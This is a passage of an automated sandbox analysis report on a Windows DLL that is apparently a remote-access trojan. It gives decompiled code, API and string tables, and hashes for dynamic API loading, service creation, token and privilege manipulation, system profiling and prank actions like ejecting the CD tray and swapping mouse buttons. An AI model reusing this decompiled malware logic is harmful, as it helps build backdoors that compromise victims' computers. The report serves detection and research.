					_t112 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0x104)) = GetProcAddress( *_t112, "SendMessageA");
					_t114 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0x108)) = GetProcAddress( *_t114, "EnumWindows");
					_t116 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0x10c)) = GetProcAddress( *_t116, "PostThreadMessageA");
					_t118 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0x110)) = GetProcAddress( *_t118, "GetInputState");
					_t120 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0x114)) = GetProcAddress( *_t120, "GetMessageA");
					_t273 = LoadLibraryA("MSVCRT.dll");
					 *(_t331 + 0x18) = _t273;
					 *((intOrPtr*)(_t331 + 0x160)) = GetProcAddress(_t273, "strcmp");
					_t124 = _t331 + 0x18; // 0x758c0000
					 *((intOrPtr*)(_t331 + 0x164)) = GetProcAddress( *_t124, "strlen");
					_t126 = _t331 + 0x18; // 0x758c0000
					 *((intOrPtr*)(_t331 + 0x168)) = GetProcAddress( *_t126, "memcpy");
					_t128 = _t331 + 0x18; // 0x758c0000
					 *((intOrPtr*)(_t331 + 0x16c)) = GetProcAddress( *_t128, "memset");
					_t130 = _t331 + 0x18; // 0x758c0000
					 *((intOrPtr*)(_t331 + 0x170)) = GetProcAddress( *_t130, "strstr");
					_t279 = LoadLibraryA("ws2_32.dll");
					 *(_t331 + 0x14) = _t279;
					 *((intOrPtr*)(_t331 + 0x174)) = GetProcAddress(_t279, "WSAStartup");
					_t134 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x178)) = GetProcAddress( *_t134, "WSACleanup");
					_t136 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x17c)) = GetProcAddress( *_t136, "socket");
					_t138 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x180)) = GetProcAddress( *_t138, "gethostbyname");
					_t140 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x184)) = GetProcAddress( *_t140, "htons");
					_t142 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x188)) = GetProcAddress( *_t142, "connect");
					_t144 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x18c)) = GetProcAddress( *_t144, "send");
					_t146 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x190)) = GetProcAddress( *_t146, "recv");
					_t148 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x194)) = GetProcAddress( *_t148, "closesocket");
					_t150 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x198)) = GetProcAddress( *_t150, "setsockopt");
					_t152 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x19c)) = GetProcAddress( *_t152, "WSAIoctl");
					_t154 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x1a0)) = GetProcAddress( *_t154, "select");
					_t156 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x1a4)) = GetProcAddress( *_t156, "getsockname");
					_t158 = _t331 + 0x14; // 0x75300000
					 *((intOrPtr*)(_t331 + 0x1a8)) = GetProcAddress( *_t158, "gethostname");
					_t294 = LoadLibraryA("ADVAPI32.dll");
					 *(_t331 + 0x10) = _t294;
					 *((intOrPtr*)(_t331 + 0x118)) = GetProcAddress(_t294, "StartServiceCtrlDispatcherA");
					_t162 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x11c)) = GetProcAddress( *_t162, "SetServiceStatus");
					_t164 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x120)) = GetProcAddress( *_t164, "RegisterServiceCtrlHandlerA");
					_t166 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x124)) = GetProcAddress( *_t166, "OpenSCManagerA");
					_t168 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x128)) = GetProcAddress( *_t168, "OpenServiceA");
					_t170 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x12c)) = GetProcAddress( *_t170, "StartServiceA");
					_t172 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x130)) = GetProcAddress( *_t172, "CloseServiceHandle");
					_t174 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x134)) = GetProcAddress( *_t174, "QueryServiceStatus");
					_t176 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x138)) = GetProcAddress( *_t176, "ControlService");
					_t178 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x13c)) = GetProcAddress( *_t178, "CreateServiceA");
					_t180 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x140)) = GetProcAddress( *_t180, "ChangeServiceConfig2A");
					_t182 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x144)) = GetProcAddress( *_t182, "DeleteService");
					_t184 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x148)) = GetProcAddress( *_t184, "OpenProcessToken");
					_t186 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x14c)) = GetProcAddress( *_t186, "DuplicateTokenEx");
					_t188 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x150)) = GetProcAddress( *_t188, "SetTokenInformation");
					_t190 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x154)) = GetProcAddress( *_t190, "CreateProcessAsUserA");
					_t192 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x158)) = GetProcAddress( *_t192, "LookupPrivilegeValueA");
					_t194 = _t331 + 0x10; // 0x75d50000
					 *((intOrPtr*)(_t331 + 0x15c)) = GetProcAddress( *_t194, "AdjustTokenPrivileges");
					_t313 = LoadLibraryA("Shell32.dll");
					 *(_t331 + 0x20) = _t313;
					 *((intOrPtr*)(_t331 + 0x1ac)) = GetProcAddress(_t313, "SHGetSpecialFolderPathA");
					_t198 = _t331 + 0x20; // 0x760b0000
					 *((intOrPtr*)(_t331 + 0x1b0)) = GetProcAddress( *_t198, "ShellExecuteA");
					_t316 = LoadLibraryA("SHLWAPI.dll");
					 *(_t331 + 0x24) = _t316;
					 *((intOrPtr*)(_t331 + 0x1b4)) = GetProcAddress(_t316, "PathRemoveBackslashA");
					_t202 = _t331 + 0x24; // 0x750c0000
					 *((intOrPtr*)(_t331 + 0x1b8)) = GetProcAddress( *_t202, "PathFileExistsA");
					_t204 = _t331 + 0x24; // 0x750c0000
					 *((intOrPtr*)(_t331 + 0x1bc)) = GetProcAddress( *_t204, "PathRemoveFileSpecA");
					_t206 = _t331 + 0x24; // 0x750c0000
					 *((intOrPtr*)(_t331 + 0x1c0)) = GetProcAddress( *_t206, "PathAddBackslashA");
					_t208 = _t331 + 0x24; // 0x750c0000
					_t321 = GetProcAddress( *_t208, "PathStripPathA");
					 *(_t331 + 0x1c4) = _t321;
					_t322 = 1;
					 *((intOrPtr*)(_t331 + 4)) = _t322;
					return _t322;
				} else {
					return 0;
				}
			}

0x1000c520
0x1000c526
0x1000c539
0x1000c547
0x1000c551
0x1000c554
0x1000c55e
0x1000c561
0x1000c56b
0x1000c56e
0x1000c578
0x1000c57b
0x1000c585
0x1000c588
0x1000c592
0x1000c595
0x1000c59f
0x1000c5a2
0x1000c5ac
0x1000c5af
0x1000c5b9
0x1000c5bc
0x1000c5c6
0x1000c5c9
0x1000c5d3
0x1000c5d6
0x1000c5e0
0x1000c5e3
0x1000c5ed
0x1000c5f0
0x1000c5fa
0x1000c5fd
0x1000c607
0x1000c60a
0x1000c614
0x1000c617
0x1000c621
0x1000c624
0x1000c62e
0x1000c631
0x1000c63b
0x1000c63e
0x1000c648
0x1000c64b
0x1000c655
0x1000c658
0x1000c662
0x1000c665
0x1000c66f
0x1000c675
0x1000c67f
0x1000c685
0x1000c68f
0x1000c695
0x1000c69f
0x1000c6a5
0x1000c6af
0x1000c6b5
0x1000c6bf
0x1000c6c5
0x1000c6cf
0x1000c6d5
0x1000c6df
0x1000c6e5
0x1000c6ef
0x1000c6f5
0x1000c6ff
0x1000c705
0x1000c70f
0x1000c715
0x1000c71f
0x1000c725
0x1000c72f
0x1000c735
0x1000c73f
0x1000c745
0x1000c74f
0x1000c755
0x1000c75f
0x1000c765
0x1000c76f
0x1000c775
0x1000c77f
0x1000c785
0x1000c78f
0x1000c795
0x1000c79f
0x1000c7a5
0x1000c7af
0x1000c7b5
0x1000c7bf
0x1000c7c5
0x1000c7cf
0x1000c7d5
0x1000c7df
0x1000c7e5
0x1000c7ed
0x1000c7f7
0x1000c7fd
0x1000c807
0x1000c80d
0x1000c817
0x1000c81d
0x1000c827
0x1000c82d
0x1000c837
0x1000c83d
0x1000c847
0x1000c84d
0x1000c857
0x1000c85d
0x1000c867
0x1000c86d
0x1000c877
0x1000c87d
0x1000c887
0x1000c88d
0x1000c897
0x1000c89d
0x1000c8a2
0x1000c8ad
0x1000c8b7
0x1000c8bd
0x1000c8c7
0x1000c8cd
0x1000c8d5
0x1000c8df
0x1000c8e5
0x1000c8ef
0x1000c8f5
0x1000c8ff
0x1000c905
0x1000c90f
0x1000c915
0x1000c91f
0x1000c925
0x1000c92d
0x1000c937
0x1000c93d
0x1000c947
0x1000c94d
0x1000c957
0x1000c95d
0x1000c967
0x1000c96d
0x1000c977
0x1000c97d
0x1000c987
0x1000c98d
0x1000c997
0x1000c99d
0x1000c9a7
0x1000c9ad
0x1000c9b7
0x1000c9bd
0x1000c9c7
0x1000c9cd
0x1000c9d7
0x1000c9dd
0x1000c9e2
0x1000c9ed
0x1000c9f7
0x1000c9fd
0x1000ca07
0x1000ca0d
0x1000ca15
0x1000ca1f
0x1000ca25
0x1000ca2f
0x1000ca35
0x1000ca3f
0x1000ca45
0x1000ca4f
0x1000ca55
0x1000ca5f
0x1000ca65
0x1000ca6f
0x1000ca75
0x1000ca7f
0x1000ca85
0x1000ca8f
0x1000ca95
0x1000ca9f
0x1000caa5
0x1000caaf
0x1000cab5
0x1000cabf
0x1000cac5
0x1000cacf
0x1000cad5
0x1000cadf
0x1000cae5
0x1000caef
0x1000caf5
0x1000caff
0x1000cb05
0x1000cb0f
0x1000cb15
0x1000cb1f
0x1000cb25
0x1000cb2f
0x1000cb35
0x1000cb3d
0x1000cb47
0x1000cb4d
0x1000cb57
0x1000cb5d
0x1000cb65
0x1000cb6f
0x1000cb75
0x1000cb7f
0x1000cb85
0x1000cb8f
0x1000cb95
0x1000cb9f
0x1000cba5
0x1000cba8
0x1000cbac
0x1000cbb2
0x1000cbb4
0x1000cbb9
0x1000c528
0x1000c52b
0x1000c52b

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,1000BB0B), ref: 1000C539
GetProcAddress.KERNEL32(00000000,DeleteFileA), ref: 1000C54A
GetProcAddress.KERNEL32(74AF0000,CopyFileA), ref: 1000C557
GetProcAddress.KERNEL32(74AF0000,GlobalLock), ref: 1000C564
GetProcAddress.KERNEL32(74AF0000,GlobalAlloc), ref: 1000C571
GetProcAddress.KERNEL32(74AF0000,GlobalUnlock), ref: 1000C57E
GetProcAddress.KERNEL32(74AF0000,GetCurrentProcessId), ref: 1000C58B
GetProcAddress.KERNEL32(74AF0000,GetCurrentThread), ref: 1000C598
GetProcAddress.KERNEL32(74AF0000,WinExec), ref: 1000C5A5
GetProcAddress.KERNEL32(74AF0000,DuplicateHandle), ref: 1000C5B2
GetProcAddress.KERNEL32(74AF0000,TerminateProcess), ref: 1000C5BF
GetProcAddress.KERNEL32(74AF0000,OpenProcess), ref: 1000C5CC
GetProcAddress.KERNEL32(74AF0000,GetCurrentThreadId), ref: 1000C5D9
GetProcAddress.KERNEL32(74AF0000,SetPriorityClass), ref: 1000C5E6
GetProcAddress.KERNEL32(74AF0000,SetThreadPriority), ref: 1000C5F3
GetProcAddress.KERNEL32(74AF0000,QueryFullProcessImageNameA), ref: 1000C600
GetProcAddress.KERNEL32(74AF0000,SetUnhandledExceptionFilter), ref: 1000C60D
GetProcAddress.KERNEL32(74AF0000,CreateDirectoryA), ref: 1000C61A
GetProcAddress.KERNEL32(74AF0000,SetFileAttributesA), ref: 1000C627
GetProcAddress.KERNEL32(74AF0000,DefineDosDeviceA), ref: 1000C634
GetProcAddress.KERNEL32(74AF0000,GetVersion), ref: 1000C641
GetProcAddress.KERNEL32(74AF0000,VirtualAlloc), ref: 1000C64E
GetProcAddress.KERNEL32(74AF0000,CreateProcessA), ref: 1000C65B
GetProcAddress.KERNEL32(74AF0000,GetModuleFileNameA), ref: 1000C668

Strings

AdjustTokenPrivileges, xrefs: 1000CB1A
GetCurrentThread, xrefs: 1000C58D
GetSystemInfo, xrefs: 1000C77A
EmptyClipboard, xrefs: 1000C7F2
CreateServiceA, xrefs: 1000CA9A
GetCurrentThreadId, xrefs: 1000C5CE
closesocket, xrefs: 1000C9A2
PathRemoveBackslashA, xrefs: 1000CB5F
GetCurrentProcessId, xrefs: 1000C580
getsockname, xrefs: 1000C9E8
WinExec, xrefs: 1000C59A
DeleteService, xrefs: 1000CABA
DuplicateHandle, xrefs: 1000C5A7
GetClipboardData, xrefs: 1000C812
connect, xrefs: 1000C972
SetPriorityClass, xrefs: 1000C5DB
ws2_32.dll, xrefs: 1000C91A
OpenServiceA, xrefs: 1000CA4A
SetFileAttributesA, xrefs: 1000C61C
SetTokenInformation, xrefs: 1000CAEA
OpenClipboard, xrefs: 1000C822
ResetEvent, xrefs: 1000C70A
CreateEventA, xrefs: 1000C6FA
ControlService, xrefs: 1000CA8A
MoveFileA, xrefs: 1000C79A
LookupPrivilegeValueA, xrefs: 1000CB0A
ExitWindowsEx, xrefs: 1000C842
CopyFileA, xrefs: 1000C54C
CloseHandle, xrefs: 1000C69A
TerminateProcess, xrefs: 1000C5B4
StartServiceCtrlDispatcherA, xrefs: 1000CA0F
GetVersion, xrefs: 1000C636
lstrcatA, xrefs: 1000C6BA
GetModuleFileNameA, xrefs: 1000C65D
IsWindowVisible, xrefs: 1000C862
WaitForSingleObject, xrefs: 1000C6DA
PathAddBackslashA, xrefs: 1000CB8A
StartServiceA, xrefs: 1000CA5A
PathRemoveFileSpecA, xrefs: 1000CB7A
OpenSCManagerA, xrefs: 1000CA3A
QueryFullProcessImageNameA, xrefs: 1000C5F5
MoveFileExA, xrefs: 1000C7AA
recv, xrefs: 1000C992
DeleteFileA, xrefs: 1000C541
TerminateThread, xrefs: 1000C73A
GetTickCount, xrefs: 1000C6CA
SetEvent, xrefs: 1000C72A
memset, xrefs: 1000C8FA
PathFileExistsA, xrefs: 1000CB6A
memcpy, xrefs: 1000C8EA
ReleaseMutex, xrefs: 1000C67A
MSVCRT.dll, xrefs: 1000C8C2
setsockopt, xrefs: 1000C9B2
CreateMutexA, xrefs: 1000C66A
strlen, xrefs: 1000C8DA
DefineDosDeviceA, xrefs: 1000C629
CreateProcessAsUserA, xrefs: 1000CAFA
Shell32.dll, xrefs: 1000CB2A
QueryServiceStatus, xrefs: 1000CA7A
OpenProcess, xrefs: 1000C5C1
GetLastError, xrefs: 1000C68A
strstr, xrefs: 1000C90A
htons, xrefs: 1000C962
GetInputState, xrefs: 1000C8A8
GlobalAlloc, xrefs: 1000C566
SHLWAPI.dll, xrefs: 1000CB52
GlobalUnlock, xrefs: 1000C573
CancelIo, xrefs: 1000C71A
GetCurrentProcess, xrefs: 1000C7CA
ExpandEnvironmentStringsA, xrefs: 1000C76A
WTSGetActiveConsoleSessionId, xrefs: 1000C7BA
ADVAPI32.dll, xrefs: 1000CA02
wsprintfA, xrefs: 1000C832
ShellExecuteA, xrefs: 1000CB42
GlobalLock, xrefs: 1000C559
gethostbyname, xrefs: 1000C952
VirtualAlloc, xrefs: 1000C643
SetThreadPriority, xrefs: 1000C5E8
GetFileAttributesA, xrefs: 1000C6EA
PathStripPathA, xrefs: 1000CB9A
ChangeServiceConfig2A, xrefs: 1000CAAA
CreateProcessA, xrefs: 1000C650
SendMessageA, xrefs: 1000C872
SetUnhandledExceptionFilter, xrefs: 1000C602
RegisterServiceCtrlHandlerA, xrefs: 1000CA2A
MessageBoxA, xrefs: 1000C852
GetVersionExA, xrefs: 1000C74A
PostThreadMessageA, xrefs: 1000C892
GetSystemDirectoryA, xrefs: 1000C78A
SHGetSpecialFolderPathA, xrefs: 1000CB37
CreateDirectoryA, xrefs: 1000C60F
WSAStartup, xrefs: 1000C927
GetMessageA, xrefs: 1000C8B2
EnumWindows, xrefs: 1000C882
socket, xrefs: 1000C942
SetServiceStatus, xrefs: 1000CA1A
CloseServiceHandle, xrefs: 1000CA6A
select, xrefs: 1000C9D2
DuplicateTokenEx, xrefs: 1000CADA
CloseClipboard, xrefs: 1000C802
gethostname, xrefs: 1000C9F2
Sleep, xrefs: 1000C6AA
OpenProcessToken, xrefs: 1000CACA
strcmp, xrefs: 1000C8CF
SetClipboardData, xrefs: 1000C7E7
GetExitCodeProcess, xrefs: 1000C75A
User32.dll, xrefs: 1000C7DA
WSACleanup, xrefs: 1000C932
send, xrefs: 1000C982
kernel32.dll, xrefs: 1000C534
WSAIoctl, xrefs: 1000C9C2

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: ADVAPI32.dll$AdjustTokenPrivileges$CancelIo$ChangeServiceConfig2A$CloseClipboard$CloseHandle$CloseServiceHandle$ControlService$CopyFileA$CreateDirectoryA$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DefineDosDeviceA$DeleteFileA$DeleteService$DuplicateHandle$DuplicateTokenEx$EmptyClipboard$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetClipboardData$GetCurrentProcess$GetCurrentProcessId$GetCurrentThread$GetCurrentThreadId$GetExitCodeProcess$GetFileAttributesA$GetInputState$GetLastError$GetMessageA$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersion$GetVersionExA$GlobalAlloc$GlobalLock$GlobalUnlock$IsWindowVisible$LookupPrivilegeValueA$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenClipboard$OpenProcess$OpenProcessToken$OpenSCManagerA$OpenServiceA$PathAddBackslashA$PathFileExistsA$PathRemoveBackslashA$PathRemoveFileSpecA$PathStripPathA$PostThreadMessageA$QueryFullProcessImageNameA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SHGetSpecialFolderPathA$SHLWAPI.dll$SendMessageA$SetClipboardData$SetEvent$SetFileAttributesA$SetPriorityClass$SetServiceStatus$SetThreadPriority$SetTokenInformation$SetUnhandledExceptionFilter$Shell32.dll$ShellExecuteA$Sleep$StartServiceA$StartServiceCtrlDispatcherA$TerminateProcess$TerminateThread$User32.dll$VirtualAlloc$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$WinExec$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$ws2_32.dll$wsprintfA
API String ID: 2238633743-662909096
Opcode ID: 18479448866e3286e0f3e70c63ebb1e7b4a6997549a5258a78e2a0a5023a7fa6
Instruction ID: ba0100112cb5783d6c11cb46e4f217b98d1bfac44f287018ae8bbbfa82b62b96
Opcode Fuzzy Hash: 18479448866e3286e0f3e70c63ebb1e7b4a6997549a5258a78e2a0a5023a7fa6
Instruction Fuzzy Hash: 09025670401B85AED731EF32EC04EABBEE1FF85312B81492DE5AB56520D732A855DF48

Uniqueness

Uniqueness Score: -1.00%

Function 100078C6, Relevance: 54.4, APIs: 23, Strings: 8, Instructions: 146
sleepwindowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E100078C6(intOrPtr _a4) {
				struct tagRECT _v20;
				signed int _t16;

				_t16 = _a4 + 0xffffff83;
				if(_t16 <= 0xc) {
					switch( *((intOrPtr*)(_t16 * 4 +  &M10007A6B))) {
						case 0:
							return E100077D3(1);
						case 1:
							__ebx = 0;
							_push(0);
							_push(0);
							_push(0);
							_push("set cdaudio door open");
							goto L14;
						case 2:
							__ebx = 0;
							_push(0);
							_push(0);
							_push(0);
							_push("set cdaudio door closed wait");
							L14:
							return mciSendStringA();
						case 3:
							__ebx = 0;
							__eax = FindWindowA("Progman", 0);
							_push(0);
							goto L5;
						case 4:
							__eax = FindWindowA("Progman", 0);
							_push(5);
							L5:
							return __eax;
						case 5:
							__esi = 0x3e8;
							do {
								__eax = Beep(__esi, 0x1e);
								Sleep(0x64);
								__esi = __esi + 1;
							} while (__esi < 0x41a);
							return __eax;
						case 6:
							__eax = GetForegroundWindow();
							__esi = MoveWindow;
							_push(0xf);
							__edi = __eax;
							_pop(__ebx);
							do {
								 &_v20 = GetWindowRect(__edi,  &_v20);
								__ecx = _v20.bottom;
								__eax = _v20.top;
								__edx = _v20.right;
								__ecx = _v20.bottom - __eax;
								__ecx = _v20.left;
								__eax = __eax + 8;
								__edx = _v20.right - __ecx;
								__eax = MoveWindow(__edi, __ecx, __eax, __edx, _v20.bottom - __eax, 1);
								Sleep(0x28);
								_v20.bottom = _v20.bottom - _v20.top;
								_v20.right = _v20.right - _v20.left;
								__eax = MoveWindow(__edi, _v20.left, _v20.top, _v20.right - _v20.left, _v20.bottom - _v20.top, 1);
								Sleep(0x28);
								__eax = Beep(0xfff, 0xa);
								__ebx = __ebx - 1;
							} while (__ebx != 0);
							return __eax;
						case 7:
							_push(2);
							goto L11;
						case 8:
							_push(0xffffffff);
							L11:
							__ebx = 0;
							__eax = FindWindowA(0, 0);
							return __eax;
						case 9:
							__esi = FindWindowA;
							__ebx = 0;
							__eax = FindWindowA("Shell_TrayWnd", 0);
							__edi = ShowWindow;
							__eax = ShowWindow(__eax, 0);
							__eax = FindWindowA("Button", 0x10024680);
							_push(0);
							goto L8;
						case 0xa:
							__esi = FindWindowA;
							__eax = FindWindowA("Shell_TrayWnd", 0);
							__edi = ShowWindow;
							__eax = ShowWindow(__eax, 5);
							__eax = FindWindowA("Button", 0x100246a0);
							_push(5);
							L8:
							return __eax;
						case 0xb:
							_push(1);
							goto L23;
						case 0xc:
							_push(0);
							L23:
							return SwapMouseButton();
					}
				}
				return _t16;
			}

0x100078d0
0x100078d8
0x100078de
0x00000000
0x00000000
0x00000000
0x1000799d
0x1000799f
0x100079a0
0x100079a1
0x100079a2
0x00000000
0x00000000
0x100079a9
0x100079ab
0x100079ac
0x100079ad
0x100079ae
0x100079b3
0x00000000
0x00000000
0x100078f2
0x100078fa
0x10007900
0x00000000
0x00000000
0x1000790a
0x10007910
0x10007912
0x00000000
0x00000000
0x100079be
0x100079c3
0x100079c6
0x100079ce
0x100079d4
0x100079d5
0x00000000
0x00000000
0x100079e2
0x100079e8
0x100079ee
0x100079f0
0x100079f2
0x100079f3
0x100079f8
0x100079fe
0x10007a01
0x10007a04
0x10007a07
0x10007a0c
0x10007a0f
0x10007a12
0x10007a1b
0x10007a1f
0x10007a2a
0x10007a31
0x10007a3c
0x10007a40
0x10007a4d
0x10007a53
0x10007a53
0x00000000
0x00000000
0x10007977
0x00000000
0x00000000
0x1000797b
0x1000797d
0x10007982
0x1000798b
0x00000000
0x00000000
0x1000791e
0x10007924
0x1000792c
0x1000792e
0x10007936
0x10007942
0x10007944
0x00000000
0x00000000
0x10007947
0x10007954
0x10007956
0x1000795f
0x1000796b
0x1000796d
0x1000796f
0x00000000
0x00000000
0x10007a58
0x00000000
0x00000000
0x10007a5c
0x10007a5e
0x00000000
0x00000000
0x100078de
0x10007a68

APIs

FindWindowA.USER32 ref: 100078FA
FindWindowA.USER32 ref: 1000790A
ShowWindow.USER32(00000000,00000000), ref: 10007913
FindWindowA.USER32 ref: 1000792C
ShowWindow.USER32(00000000,00000000), ref: 10007936
FindWindowA.USER32 ref: 10007942
FindWindowA.USER32 ref: 10007954
ShowWindow.USER32(00000000,00000005), ref: 1000795F
FindWindowA.USER32 ref: 1000796B
ShowWindow.USER32(00000000,00000000), ref: 10007970
FindWindowA.USER32 ref: 1000798B
SendMessageA.USER32(00000000), ref: 10007992
mciSendStringA.WINMM(set cdaudio door open,00000000,00000000,00000000), ref: 100079B3
Beep.KERNEL32 ref: 100079C6
Sleep.KERNEL32(00000064), ref: 100079CE
GetForegroundWindow.USER32 ref: 100079E2
GetWindowRect.USER32 ref: 100079F8
MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 10007A1B
Sleep.KERNEL32(00000028), ref: 10007A1F
MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 10007A3C
Sleep.KERNEL32(00000028), ref: 10007A40
Beep.KERNEL32 ref: 10007A4D
SwapMouseButton.USER32(00000001), ref: 10007A5E

Strings

Shell_TrayWnd, xrefs: 10007927
Button, xrefs: 10007966
Button, xrefs: 1000793D
Progman, xrefs: 10007905
set cdaudio door open, xrefs: 100079A2
Progman, xrefs: 100078F5
set cdaudio door closed wait, xrefs: 100079AE
Shell_TrayWnd, xrefs: 1000794F

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Window$Find$Show$Sleep$BeepMoveSend$ButtonForegroundMessageMouseRectStringSwap
String ID: Button$Button$Progman$Progman$Shell_TrayWnd$Shell_TrayWnd$set cdaudio door closed wait$set cdaudio door open
API String ID: 2677282953-2312788358
Opcode ID: 86abe80112e4d24d678277c6ccdd1efaf668594e17b236cbab986c236d6720a1
Instruction ID: 5e46c20f6ce7c1bfabcb40294995c8355a069115fe53b24dd2c83d1016c02ae3
Opcode Fuzzy Hash: 86abe80112e4d24d678277c6ccdd1efaf668594e17b236cbab986c236d6720a1
Instruction Fuzzy Hash: 9E41A072A40628BFF710EBE49CCDFAF3A7CFB89795F154054F614A6190CB749E008A62

Uniqueness

Uniqueness Score: -1.00%

Function 1000AED0, Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 242
stringcomCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000AED0(void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				int _v24;
				long _v28;
				struct tagLASTINPUTINFO _v36;
				char _v48;
				void _v52;
				struct _MEMORYSTATUSEX _v116;
				char _v182;
				char _v232;
				char _v252;
				int _v256;
				char _v288;
				signed int _v292;
				char _v502;
				char _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v588;
				intOrPtr _v592;
				char _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				struct _OSVERSIONINFOA _v780;
				char _v832;
				char _v836;
				char _v867;
				char _v868;
				void _v1123;
				char _v1124;
				char _v1384;
				signed int _v1704;
				char _v1764;
				intOrPtr _t119;
				char* _t120;
				intOrPtr* _t121;
				intOrPtr* _t123;
				long _t130;
				intOrPtr _t145;
				intOrPtr* _t162;
				void* _t170;
				void* _t172;
				signed int _t178;
				int _t192;
				intOrPtr _t207;
				void* _t214;

				_t214 = __fp0;
				_v868 = 0xc8;
				wsprintfA( &_v1384, "SYSTEM\\CurrentControlSet\\Services\\%s", "Vwxyab Defghijk");
				memset( &_v867, 0, 0x1e);
				E1000D28E(0x80000001,  &_v1384, "Group", 1,  &_v867, 0, lstrlenA( &_v867), 0);
				_t192 = 0x10;
				memset( &_v52, 0, _t192);
				_t197 = _a4;
				_v24 = _t192;
				 *0x100273b4( *((intOrPtr*)(_a4 + 0x48)),  &_v52,  &_v24);
				E10008F48( &_v832, 0x32,  &_v1384);
				_t207 =  *0x100275a0; // 0x0
				if(_t207 != 0) {
					E1000AD07( &_v836);
					_pop(_t170);
				}
				E1000AEA7( &_v836,  &_v48, 4);
				E1000AEA7( &_v832,  &_v832, 0x32);
				_v780.dwOSVersionInfoSize = 0x9c;
				GetVersionExA( &_v780);
				if(E1000901E( &_v12,  &_v16,  &_v20) != 0) {
					_v624 = _v12;
					_v620 = _v16;
					_v616 = _v20;
				}
				_v580 = E10008FDE(_t170) & 0xffffff00 | _t113 != 0x00000000;
				E10008EEE( &_v612);
				_v116.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v116);
				_t172 = 0x14;
				_t119 = E10015A50(_v116.ullTotalPhys, _t172, _v116.ullAvailPhys);
				_v576 = _t119;
				__imp__CoInitialize(0);
				_t120 =  &_v8;
				__imp__CoCreateInstance(0x1001ffb8, 0, 0x17, 0x1001ffa8, _t120);
				if(_t120 >= 0) {
					_t162 = _v8;
					 *((intOrPtr*)( *_t162 + 0x48))(_t162, 0);
				}
				_t121 = _v8;
				_v1764 = 0x17c;
				 *((intOrPtr*)( *_t121 + 0x2c))(_t121,  &_v1764, 0);
				_t123 = _v8;
				 *((intOrPtr*)( *_t123 + 8))(_t123);
				_v256 = 0;
				_v36.cbSize = 8;
